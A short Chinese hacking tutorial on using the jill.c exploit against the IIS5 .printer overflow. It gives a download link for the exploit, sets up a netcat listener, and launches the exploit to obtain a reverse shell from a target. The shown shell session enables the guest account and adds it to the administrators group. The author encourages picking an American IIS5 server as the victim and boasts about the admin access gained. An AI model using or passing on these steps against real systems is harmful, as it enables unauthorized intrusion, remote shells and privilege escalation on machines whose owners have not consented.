下 载: http://hack.wudu.net/download/wdsoft/01-jill.c
这个漏洞是由eEye发现的,现在网上已经出现了入侵的工具,jill.c就是其中之一,下面说说用法:
1,在类unix系统上编译jill.c,编译成功后看一下说明文档.
大致用法是:
#./jill 以上没什么好说明的,主要就是这个攻击者的绑定端口.这个是什么意思呢?
下面说来
2,在本地用nc绑定cmd.exe到任意端口
用法是:
D:\nc -l -p xxx -vv
listening on [any] xxx ...
这个xxx就是你想绑定的端口了,绑定以后就可以试试入侵了.挑个霉国的iis5机器.
3,绑定cmd.exe,开始入侵
绑定
D:\nc -l -p 199 -vv
listening on [any] 199 ...
入侵
# ./jill xxx.xxx.xx.xx 80 xx.xxx.xx.xx 199
iis5 remote .printer overflow.
dark spyrit / beavuh labs.
connecting...
sent...
you may need to send a carriage on your listener if the
shell doesn't appear.
have fun!
上面的199就是我绑定的端口啦!看看
D:\nc -l -p 199 -vv
listening on [any] 199 ...
xxx.xxx.xx.xx: inverse host lookup failed: h_errno
11004: NO_DATA
connect to [xx.xxx.xxx.xx] from (UNKNOWN)
[xx.xxx.xxx.xx] 3631:NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNTnet user guest /active
net user guest /active
The command completed successfully.
C:\WINNTnet localgroup administrators guest /add
net localgroup administrators guest /add
The command completed successfully.
嘿嘿!admin权限!什么不可以做到呢?:)
